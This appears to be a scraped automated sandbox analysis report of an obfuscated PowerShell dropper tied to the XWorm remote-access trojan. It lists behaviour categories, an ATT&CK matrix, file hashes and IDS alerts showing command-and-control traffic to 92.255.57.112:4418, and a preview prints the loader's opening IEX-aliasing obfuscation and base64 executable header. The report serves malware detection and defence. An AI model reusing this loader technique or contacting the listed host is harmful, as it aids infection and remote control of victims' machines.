Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: |
Source: | Code function: | 0_2_00007FFD3488D5D3 | |
Source: | Code function: | 0_2_00007FFD3488303D | |
Source: | Code function: | 0_2_00007FFD348809C9 | |
Source: | Code function: | 3_2_02888081 | |
Source: | Code function: | 3_2_02884CD1 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File Volume queried: | Jump to behavior | ||
Source: | File Volume queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 231 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 231 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 211 Process Injection | Security Account Manager | 231 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 23 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
18% | Virustotal | Browse | ||
13% | ReversingLabs | Script.Trojan.Heuristic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
15.164.165.52.in-addr.arpa | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
92.255.57.112 | unknown | Russian Federation | 42253 | TELSPRU | true |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1590525 |
Start date and time: | 2025-01-14 08:26:32 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 57s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 10 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 92.255.57_1.112.ps1 |
Detection: | MAL |
Classification: | mal100.troj.evad.winPS1@6/9@1/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.159.75, 13.107.246.45, 4.245.163.56, 52.165.164.15
- Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
Time | Type | Description |
---|---|---|
02:27:23 | API Interceptor | |
02:27:27 | API Interceptor | |
02:27:27 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
92.255.57.112 | Get hash | malicious | XWorm | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELSPRU | Get hash | malicious | XWorm | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a2abdbfe428d67222a333c07b1678b548034_00000000_54e5abc7-bd2e-46d6-8d39-0df8afbbefde\Report.wer
Download File
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.5319159604060092 |
Encrypted: | false |
SSDEEP: | 96:JvjUF/Yj4brxYid8IRH3Uje0e35/3oo16l51QXIGZAX/d5FMT2SlPkpXmTA/f/VD:hjUFa4bmG5R30md8cAzuiF3Z24lO8D |
MD5: | 71570DD932FB049B2FB7EBCC488387F5 |
SHA1: | DB05666F22875C070B381191A0855B6F27E5DE9B |
SHA-256: | 612D28A575B2725FD405013A807AF7532AD067CFD4AA102ACF93B6655B9096CE |
SHA-512: | 71845BB8761F055EA30FBDFDF6C39DEF46FD98DB3B0F7C25AFD7200A3A628A61DFA891B103E1C8415DDA429BD1F75EED48E34B31D6E486BABD1CFE48F1FC2607 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7284 |
Entropy (8bit): | 3.7387095707741227 |
Encrypted: | false |
SSDEEP: | 192:R6l7wVeJmSDa6Y2DEj0BDgmft887ZphUXVm:R6lXJLe6YZj0BDgmftZRc4 |
MD5: | 3E1149EF1AD8DFF5BD95EC0B6C99F1AF |
SHA1: | 782CE759C658A86B8C802D6EF12E57F89DB7FFC7 |
SHA-256: | 7912B0875413BFF504AD16C629927106C28C9357C5E880FF9073046237B8B78D |
SHA-512: | 85DDCBA6AB8DD69D9D18C04EA7C595C760DA14521CD52791AEE8E63EEA2734929DCE13685B0297857DA55BAA98F9C5B00C1FB66F3C9F581F5882AADC247AE24E |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4905 |
Entropy (8bit): | 4.685576687829041 |
Encrypted: | false |
SSDEEP: | 96:uIjfEkI76j7V8SJFKloF1cmFIWTzF1cmFHjufMd:uIvY6j7x4JuUGjufy |
MD5: | 6F5C77BFC1D3C9C3D7F99E8C1F4B0B68 |
SHA1: | 52F9A60B9D80BDAF8315E79FBDD736D7DD24766C |
SHA-256: | 371129BD6F8AF2678270295DBE74B59B9DEEE3E50D24B015AF4AC753EC2F0355 |
SHA-512: | 58B2C24681F83AE5F683978BD91231BD5C3C7FE21EEAC669CA6914270B3B5FCEDB4309FE514951221E9A52AD6409B07F37B8588D9F2921F21A57146691185A52 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul/nq/llh:NllUyt |
MD5: | AB80AD9A08E5B16132325DF5584B2CBE |
SHA1: | F7411B7A5826EE6B139EBF40A7BEE999320EF923 |
SHA-256: | 5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4 |
SHA-512: | 9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6224 |
Entropy (8bit): | 3.7211142793483583 |
Encrypted: | false |
SSDEEP: | 48:WLa1RSDdlWtMaU3CyOU2URCukvhkvklCywGhQJCSlHJ2SogZoyBQJCSlw2SogZoI:j0/N3CETdkvhkvCCt6cCSDHJcCSoHp |
MD5: | 927535DAD9F6A7509DEE532E26D6D254 |
SHA1: | 278AF190BE58773A31C502135EAB9DF53FF3CDE7 |
SHA-256: | 6AC5B8A707B7E1931C71828891067D1E562699D098055228EF67B7585827E3D8 |
SHA-512: | 6FCE1F081BF71450C72BE3B41C69CC618B5C61233258EF3293BCB3472923D1A6DC8D7F5CC2B2B87E2D7D284844181E6E57FFD0312DC8F3611FB00A2DC7ABAD6E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6ME6YRELRW9LTQRIXF9V.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6224 |
Entropy (8bit): | 3.7211142793483583 |
Encrypted: | false |
SSDEEP: | 48:WLa1RSDdlWtMaU3CyOU2URCukvhkvklCywGhQJCSlHJ2SogZoyBQJCSlw2SogZoI:j0/N3CETdkvhkvCCt6cCSDHJcCSoHp |
MD5: | 927535DAD9F6A7509DEE532E26D6D254 |
SHA1: | 278AF190BE58773A31C502135EAB9DF53FF3CDE7 |
SHA-256: | 6AC5B8A707B7E1931C71828891067D1E562699D098055228EF67B7585827E3D8 |
SHA-512: | 6FCE1F081BF71450C72BE3B41C69CC618B5C61233258EF3293BCB3472923D1A6DC8D7F5CC2B2B87E2D7D284844181E6E57FFD0312DC8F3611FB00A2DC7ABAD6E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.469404423457669 |
Encrypted: | false |
SSDEEP: | 6144:7zZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuN2jDH5S:3ZHtYZWOKnMM6bFpwj4 |
MD5: | 58C8AA287D7ED582D88BC002F4F946DE |
SHA1: | 0027660ECDEC1B189E3C60FAC865D9D28234EA37 |
SHA-256: | 914412963481C88E50DF474BE3556DE0DE79C8AEE620B31AD4E1E3DDCA0C9934 |
SHA-512: | 372AD0900322049FA251101AD7DF79DE3D1DAAD3BD37DC66702111574F0894B746E2657D355236947E2671D2F5FF0AAC9C3B8E80D3407D9573EA0EA544214329 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.1145929156583945 |
TrID: | |
File name: | 92.255.57_1.112.ps1 |
File size: | 191'697 bytes |
MD5: | d2334ba5738e776d924f60934e24874f |
SHA1: | bb8dfe86ea75e9926de42a8acdfa4f9579681cbb |
SHA256: | 2a8290c18d10fa8a7e99575855b9fb8e734ea92b1aa7dce9840282c2657ba08c |
SHA512: | 1373a1537ca1a3fd7fe2e34ebdf30072f98beaad714353bcce168a3d9533eaf7aee7276360f5e41c29886467a591d667f7e99a543ba38b22808af32d72e92f56 |
SSDEEP: | 3072:jbUdG3oRIPejlkZ17f6f8eWDPeW03uUyicETl+uHn23LUgJiQjOC3EDbVvz2NMnK:jwG3oRTjlkZ56f8eWDPeW03uUyicUl+h |
TLSH: | 3F144B321212BC8E5F7F3F44A50429A11C9C787BAB65C59CFBC909F924AA520CF78DB4 |
File Content Preview: | .. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIp2gmcAAAAAAA |
Icon Hash: | 3270d6baae77db44 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T08:27:39.856350+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:27:40.073058+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:27:40.116270+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:27:44.937260+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:27:44.937260+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:27:51.255164+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:27:51.257204+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:02.442476+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:02.445368+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:13.635190+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:13.637235+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:14.956835+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:24.817914+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:24.820770+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
